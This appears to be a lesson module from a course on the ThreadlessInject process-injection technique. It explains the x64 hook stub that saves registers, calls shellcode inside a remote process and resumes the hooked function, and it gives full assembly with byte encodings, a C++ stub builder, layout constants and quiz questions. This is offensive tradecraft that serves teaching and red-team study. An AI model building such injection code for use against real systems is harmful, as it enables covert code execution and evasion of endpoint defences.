Module 5: The Hook Stub Architecture
The trampoline: save context, call payload, restore state, resume original function.
The Heart of ThreadlessInject
The hook stub is the most critical piece of code in the entire technique. It is what actually executes in the target process when the hooked function is called. The stub must (1) save the entire CPU register state so the shellcode doesn't corrupt the calling thread's context, (2) call the shellcode, (3) restore the register state perfectly, (4) execute the original overwritten prologue bytes, and (5) jump back to the original function to resume normal execution. If any of these steps fails, the target process crashes.
Register Preservation: The x64 Calling Convention
On Windows x64, the calling convention uses registers RCX, RDX, R8, and R9 for the first four integer/pointer arguments, with XMM0 through XMM3 for floating-point arguments. The volatile registers (RAX, RCX, RDX, R8-R11) can be modified by called functions, while nonvolatile registers (RBX, RBP, RDI, RSI, R12-R15) must be preserved by callees.
However, our hook stub is not a normal function call. It is an unexpected detour taken at the moment a thread is about to execute the hooked function, before that function has read any of its arguments. We must therefore preserve the volatile registers: RCX, RDX, R8, and R9 (and any other volatile state the caller set up) have to hold exactly the same values when the original prologue finally runs.
| Register Type | Registers | Must Save? | Why |
|---|---|---|---|
| General Purpose (volatile) | RAX, RCX, RDX, R8-R11 | Yes | Contain caller's arguments/state |
| General Purpose (nonvolatile) | RBX, RBP, RDI, RSI, R12-R15 | Optional | Shellcode that follows the calling convention preserves these itself, as any callee must |
| Stack Pointer | RSP | Implicitly | Balanced by push/pop pairs |
| Flags | RFLAGS | Ideally yes | Conditional jumps depend on flags |
| SIMD | XMM0-XMM5 | Ideally yes | XMM0-XMM3 carry floating-point arguments; XMM4-XMM5 are also volatile |
Actual Implementation: Volatile Registers Only
The actual ThreadlessInject loader stub saves only the volatile registers: RAX, RCX, RDX, R8, R9, R10, and R11 (7 registers). It does not save the nonvolatile registers (RBX, RBP, RDI, RSI, R12-R15) because any callee that follows the x64 calling convention, including the shellcode, must preserve them itself. The hook fires at the function entry point, so the only state at risk is the volatile set that a callee is allowed to clobber. The comprehensive approach shown below (saving all registers) is more defensive and is included here for pedagogical completeness.
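The save and restore sequences are mirror images of each other: registers are pushed in one order and popped in the reverse order. The sketch below generates both byte sequences from a single register list, which makes that symmetry hard to get wrong. The names `emitPushPop`, `encodeSave`, `encodeRestore`, and `kVolatileRegs` are hypothetical helpers introduced for illustration; they are not taken from the ThreadlessInject source.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Register numbers as they appear in x86-64 instruction encodings.
enum Reg : uint8_t {
    RAX = 0, RCX = 1, RDX = 2, RBX = 3, RSP = 4, RBP = 5, RSI = 6, RDI = 7,
    R8 = 8, R9 = 9, R10 = 10, R11 = 11, R12 = 12, R13 = 13, R14 = 14, R15 = 15
};

// Append `push reg` (opcode 0x50 + low 3 bits) or `pop reg` (0x58 + low 3 bits).
// R8-R15 need a REX.B prefix (0x41) to select the upper register bank.
static void emitPushPop(std::vector<uint8_t>& out, Reg reg, bool isPop) {
    assert(reg <= R15);
    if (reg >= R8) out.push_back(0x41);
    out.push_back(static_cast<uint8_t>((isPop ? 0x58 : 0x50) + (reg & 7)));
}

// Hypothetical helper: one push per register, in list order.
std::vector<uint8_t> encodeSave(const std::vector<Reg>& regs) {
    std::vector<uint8_t> out;
    for (Reg r : regs) emitPushPop(out, r, /*isPop=*/false);
    return out;
}

// Hypothetical helper: one pop per register, in reverse list order.
std::vector<uint8_t> encodeRestore(const std::vector<Reg>& regs) {
    std::vector<uint8_t> out;
    for (auto it = regs.rbegin(); it != regs.rend(); ++it)
        emitPushPop(out, *it, /*isPop=*/true);
    return out;
}

// The volatile-only set described in the text (7 registers).
const std::vector<Reg> kVolatileRegs = { RAX, RCX, RDX, R8, R9, R10, R11 };
```

Calling `encodeSave(kVolatileRegs)` yields 11 bytes (three one-byte pushes and four two-byte pushes), and `encodeRestore(kVolatileRegs)` yields the matching 11 bytes of pops.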
The Hook Stub Assembly
Here is the comprehensive version of the hook stub, which saves every general-purpose register plus RFLAGS. It is built as raw, position-independent machine code and written into the remote process. The encoding of each instruction is shown in the comment beside it:
; ThreadlessInject hook stub (x86-64 assembly)
; This code is written into the remote process and executed when
; a thread calls the hooked function
hook_stub:
; === PHASE 1: Save all registers ===
push rax ; 50
push rcx ; 51
push rdx ; 52
push rbx ; 53
push rbp ; 55
push rsi ; 56
push rdi ; 57
push r8 ; 41 50
push r9 ; 41 51
push r10 ; 41 52
push r11 ; 41 53
push r12 ; 41 54
push r13 ; 41 55
push r14 ; 41 56
push r15 ; 41 57
pushfq ; 9C (save RFLAGS)
; === PHASE 2: Align stack to 16 bytes (x64 ABI requirement) ===
mov rbp, rsp ; 48 89 E5 - save current stack pointer
and rsp, -16 ; 48 83 E4 F0 - align down to a 16-byte boundary (imm8 0xF0 is sign-extended to 64 bits)
sub rsp, 0x20 ; 48 83 EC 20 - allocate shadow space
; === PHASE 3: Call shellcode ===
; The shellcode address is embedded in the stub at a known offset
mov rax, 0xDEADBEEFCAFEBABE ; 48 B8 [8-byte shellcode address]
call rax ; FF D0
; === PHASE 4: Restore stack and all registers ===
mov rsp, rbp ; 48 89 EC - restore stack pointer
popfq ; 9D (restore RFLAGS)
pop r15 ; 41 5F
pop r14 ; 41 5E
pop r13 ; 41 5D
pop r12 ; 41 5C
pop r11 ; 41 5B
pop r10 ; 41 5A
pop r9 ; 41 59
pop r8 ; 41 58
pop rdi ; 5F
pop rsi ; 5E
pop rbp ; 5D
pop rbx ; 5B
pop rdx ; 5A
pop rcx ; 59
pop rax ; 58
; === PHASE 5: Execute original bytes (saved from hooked function) ===
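; [14 bytes of original prologue instructions are placed here]
; The copied bytes must end on an instruction boundary and must not contain
; RIP-relative operands or relative branches, which would break once moved.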
; === PHASE 6: Jump back to hooked function + 14 ===
jmp [rip+0] ; FF 25 00 00 00 00
dq original_func+14 ; [8-byte address of instruction after our overwrite]
Position-Independent Construction
Notice that the hook stub uses only instructions whose encoding does not depend on where the stub is loaded: push/pop, mov reg, imm64, call reg, and jmp [rip+0]. The jmp [rip+0] is RIP-relative, but the 8-byte slot it reads sits immediately after the instruction and therefore moves with the stub. The only absolute addresses are the shellcode pointer (embedded as an immediate in the MOV RAX) and the jump-back target (embedded after the JMP [RIP+0]). These are patched in by the injector before writing the stub to the remote process.
Building the Stub Programmatically
ThreadlessInject constructs the hook stub as a byte array in the injector process, patches in the correct addresses, and then writes the completed stub to the remote process:
// Building the hook stub as a byte array (C++)
// Each section corresponds to a phase from the assembly above.
#include <windows.h>  // BYTE, UINT64
#include <cstring>    // memcpy, memset

// The caller must supply a buffer of at least 102 bytes.
void BuildHookStub(BYTE* stub, UINT64 shellcodeAddr,
                   const BYTE* origBytes, UINT64 origFuncAddr) {
    const int kPatchLen = 14;  // bytes overwritten at the hooked function's entry
    int offset = 0;

    // Phase 1: Push all general-purpose registers + flags
    BYTE saveRegs[] = {
        0x50,        // push rax
        0x51,        // push rcx
        0x52,        // push rdx
        0x53,        // push rbx
        0x55,        // push rbp
        0x56,        // push rsi
        0x57,        // push rdi
        0x41, 0x50,  // push r8
        0x41, 0x51,  // push r9
        0x41, 0x52,  // push r10
        0x41, 0x53,  // push r11
        0x41, 0x54,  // push r12
        0x41, 0x55,  // push r13
        0x41, 0x56,  // push r14
        0x41, 0x57,  // push r15
        0x9C         // pushfq
    };
    memcpy(stub + offset, saveRegs, sizeof(saveRegs));
    offset += sizeof(saveRegs);

    // Phase 2: Align stack + shadow space
    BYTE alignStack[] = {
        0x48, 0x89, 0xE5,        // mov rbp, rsp
        0x48, 0x83, 0xE4, 0xF0,  // and rsp, -16
        0x48, 0x83, 0xEC, 0x20   // sub rsp, 0x20
    };
    memcpy(stub + offset, alignStack, sizeof(alignStack));
    offset += sizeof(alignStack);

    // Phase 3: Load shellcode address and call it
    stub[offset++] = 0x48;  // REX.W prefix
    stub[offset++] = 0xB8;  // mov rax, imm64
    memcpy(stub + offset, &shellcodeAddr, sizeof(shellcodeAddr));  // patch shellcode address
    offset += 8;
    stub[offset++] = 0xFF;  // call rax
    stub[offset++] = 0xD0;

    // Phase 4: Restore stack + pop all registers + flags
    BYTE restoreRegs[] = {
        0x48, 0x89, 0xEC,  // mov rsp, rbp
        0x9D,              // popfq
        0x41, 0x5F,        // pop r15
        0x41, 0x5E,        // pop r14
        0x41, 0x5D,        // pop r13
        0x41, 0x5C,        // pop r12
        0x41, 0x5B,        // pop r11
        0x41, 0x5A,        // pop r10
        0x41, 0x59,        // pop r9
        0x41, 0x58,        // pop r8
        0x5F,              // pop rdi
        0x5E,              // pop rsi
        0x5D,              // pop rbp
        0x5B,              // pop rbx
        0x5A,              // pop rdx
        0x59,              // pop rcx
        0x58               // pop rax
    };
    memcpy(stub + offset, restoreRegs, sizeof(restoreRegs));
    offset += sizeof(restoreRegs);

    // Phase 5: Execute the saved original bytes
    memcpy(stub + offset, origBytes, kPatchLen);
    offset += kPatchLen;

    // Phase 6: Jump back to original function + 14
    stub[offset++] = 0xFF;  // jmp [rip+0]
    stub[offset++] = 0x25;
    memset(stub + offset, 0, 4);  // RIP-relative displacement = 0
    offset += 4;
    const UINT64 jumpTarget = origFuncAddr + kPatchLen;
    memcpy(stub + offset, &jumpTarget, sizeof(jumpTarget));  // jump target
    offset += 8;
}
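Because the stub is a fixed sequence of phases, its total size and the offsets of the two patched addresses can be computed at compile time. The sketch below derives them by counting the bytes in the tables above; the constant names are hypothetical and introduced only for illustration.

```cpp
#include <cstddef>

// Size in bytes of each phase, counted from the byte tables in BuildHookStub.
constexpr std::size_t kSaveRegsSize    = 7 * 1 + 8 * 2 + 1;  // 7 short pushes, 8 REX pushes, pushfq
constexpr std::size_t kAlignStackSize  = 3 + 4 + 4;          // mov rbp,rsp / and rsp,-16 / sub rsp,0x20
constexpr std::size_t kMovRaxImm64Size = 2 + 8;              // 48 B8 + imm64
constexpr std::size_t kCallRaxSize     = 2;                  // FF D0
constexpr std::size_t kRestoreRegsSize = 3 + 1 + 8 * 2 + 7;  // mov rsp,rbp / popfq / pops
constexpr std::size_t kOrigBytesSize   = 14;                 // copied prologue bytes
constexpr std::size_t kJmpOpcodeSize   = 6;                  // FF 25 00 00 00 00

// Offset of the 8-byte shellcode address inside `mov rax, imm64`.
constexpr std::size_t kShellcodeAddrOffset = kSaveRegsSize + kAlignStackSize + 2;

// Offset of the 8-byte jump-back target that follows `jmp [rip+0]`.
constexpr std::size_t kJumpTargetOffset =
    kSaveRegsSize + kAlignStackSize + kMovRaxImm64Size + kCallRaxSize +
    kRestoreRegsSize + kOrigBytesSize + kJmpOpcodeSize;

// Total stub size: everything up to and including the jump target.
constexpr std::size_t kHookStubSize = kJumpTargetOffset + 8;

static_assert(kShellcodeAddrOffset == 37, "shellcode address slot");
static_assert(kJumpTargetOffset == 94, "jump-back target slot");
static_assert(kHookStubSize == 102, "total stub size");
```

Since the builder performs no bounds checking, a buffer of at least `kHookStubSize` (102) bytes is the minimum the caller has to provide.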
Stack Alignment: A Critical Detail
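The Windows x64 ABI requires RSP to be 16-byte aligned at the point of a CALL instruction. At function entry RSP sits 8 bytes off a 16-byte boundary, because the caller's CALL pushed a return address onto an aligned stack. Assuming the hook reaches the stub with a JMP (which pushes nothing), the stub's 16 eight-byte pushes move RSP by 128 bytes, so it is still misaligned when Phase 2 begins. The AND RSP, -16 instruction rounds RSP down to a 16-byte boundary regardless of its starting value, and the original RSP is saved in RBP beforehand so it can be restored exactly after the shellcode returns. This relies on the shellcode preserving RBP, which the calling convention requires of every callee.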
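The alignment arithmetic can be checked with plain integers. The following is a minimal model of RSP through Phases 1 and 2 of the comprehensive stub; it touches no real stack, and the function names and the sample RSP values are hypothetical.

```cpp
#include <cstdint>

// 15 general-purpose registers + RFLAGS, 8 bytes each.
constexpr uint64_t kPushCount = 16;

// RSP after Phase 1 (all pushes done).
constexpr uint64_t rspAfterPushes(uint64_t rspAtEntry) {
    return rspAtEntry - kPushCount * 8;
}

// RSP immediately before `call rax`, after Phase 2.
constexpr uint64_t rspAtCall(uint64_t rspAtEntry) {
    return (rspAfterPushes(rspAtEntry) & ~uint64_t{0xF})  // and rsp, -16
           - 0x20;                                        // sub rsp, 0x20
}

// Typical case: entry RSP ends in 8 (return address on an aligned stack).
static_assert(rspAfterPushes(0x7FF8) == 0x7F78, "128 bytes pushed");
static_assert(rspAfterPushes(0x7FF8) % 16 == 8, "still misaligned after pushes");
static_assert(rspAtCall(0x7FF8) == 0x7F50, "aligned, with shadow space");

// The AND makes the result aligned whatever the entry alignment was.
static_assert(rspAtCall(0x8000) % 16 == 0, "aligned entry also ends aligned");
```

Subtracting 0x20 after the AND keeps the alignment, because 32 is a multiple of 16.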
Hook Stub Execution Flow
[Diagram: thread calls hooked func -> JMP to hook stub -> save registers -> call shellcode -> restore registers -> original bytes + JMP back]
Shadow Space Requirement
The sub rsp, 0x20 instruction allocates 32 bytes of "shadow space" (also called "home space" or "spill space") that the x64 calling convention requires the caller to provide. Even if the shellcode doesn't use it, many Windows API functions internally expect this space to be present, and a callee is free to write to the 32 bytes directly above its return address. In this stub those bytes would otherwise be the RFLAGS and register values pushed in Phase 1, so failing to allocate the shadow space lets the shellcode (or any function it calls) overwrite the saved context when it spills its register arguments.
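To make the overlap concrete, the sketch below models the two memory ranges involved as integer intervals: the area holding the 16 saved values, and the callee's home area, which spans the 32 bytes starting at the RSP value in effect just before the CALL. The `Range` type, the helper names, and the sample address are assumptions chosen for illustration.

```cpp
#include <cstdint>

struct Range { uint64_t begin, end; };  // half-open interval [begin, end)

constexpr bool overlaps(Range a, Range b) {
    return a.begin < b.end && b.begin < a.end;
}

constexpr uint64_t alignDown16(uint64_t v) { return v & ~uint64_t{0xF}; }

// The 16 pushed values start at the RSP that Phase 2 copies into RBP.
constexpr Range savedArea(uint64_t rbp) { return { rbp, rbp + 16 * 8 }; }

// The callee's home area is the 32 bytes above its return address, i.e.
// [RSP, RSP + 0x20) measured just before the CALL executes.
constexpr Range homeArea(uint64_t rspBeforeCall) {
    return { rspBeforeCall, rspBeforeCall + 0x20 };
}

constexpr uint64_t kRbp = 0x7F78;  // sample RSP after the pushes

// With `sub rsp, 0x20`: the home area lies entirely below the saved values.
static_assert(!overlaps(homeArea(alignDown16(kRbp) - 0x20), savedArea(kRbp)),
              "shadow space keeps the saved context safe");

// Without it: the home area reaches into the saved RFLAGS and registers.
static_assert(overlaps(homeArea(alignDown16(kRbp)), savedArea(kRbp)),
              "no shadow space: callee spills can clobber saved values");
```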
Why the Stub Must Be Position-Independent
The hook stub is emitted as raw bytes and placed at an arbitrary address in the remote process. It cannot contain relocations or absolute references to its own location, because the bytes must work wherever the remote allocation happens to land. The stub has no internal branches: it transfers control only through a register-indirect call and through a jump whose target is stored right after the instruction. The two absolute addresses it needs (shellcode entry and jump-back target) point outside the stub and are patched in as data before the stub is written.
This is the same constraint that shellcode faces: you must be able to run at any address without modification. The difference is that our stub is not standalone shellcode — it's a wrapper that calls standalone shellcode and then transparently resumes the hooked function.
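One way to see why jmp [rip+0] is position-independent is to resolve it by hand. The sketch below decodes an `FF 25 disp32` instruction inside a byte buffer and reads the 8-byte target from the slot it refers to. The slot is located relative to the instruction, so the result is the same wherever the bytes are copied. The function name is hypothetical, and the code assumes a little-endian host.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Resolve `jmp qword ptr [rip+disp32]` (FF 25 disp32) located at `offset`
// inside `code`, and return the 8-byte target stored in the referenced slot.
uint64_t readRipRelativeJmpTarget(const uint8_t* code, std::size_t size,
                                  std::size_t offset) {
    assert(offset + 6 <= size);
    assert(code[offset] == 0xFF && code[offset + 1] == 0x25);

    int32_t disp;
    std::memcpy(&disp, code + offset + 2, sizeof(disp));

    // RIP points at the byte after the 6-byte instruction when it executes.
    std::size_t slot = offset + 6 + static_cast<std::ptrdiff_t>(disp);
    assert(slot + 8 <= size);

    uint64_t target;
    std::memcpy(&target, code + slot, sizeof(target));
    return target;
}
```

With a displacement of 0 the slot is the 8 bytes immediately after the instruction, which is exactly the layout Phase 6 of the stub uses.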
Correctness Guarantee
If the hook stub correctly saves and restores all registers, correctly executes the original overwritten bytes, and correctly jumps back to the right address, then the calling thread is completely unaware that the hook existed. The hooked function behaves identically to the unhooked version from the caller's perspective, except for a brief delay (the time it takes to run the shellcode). This transparency is what makes ThreadlessInject so powerful: the target process continues running normally after the injection.
Pop Quiz: Hook Stub Architecture
Q1: Why does the hook stub save volatile registers (RAX, RCX, RDX, R8-R11) even though the calling convention says callees can modify them?
Q2: What is the purpose of "AND RSP, -16" in the hook stub?
Q3: How is the shellcode address embedded in the hook stub?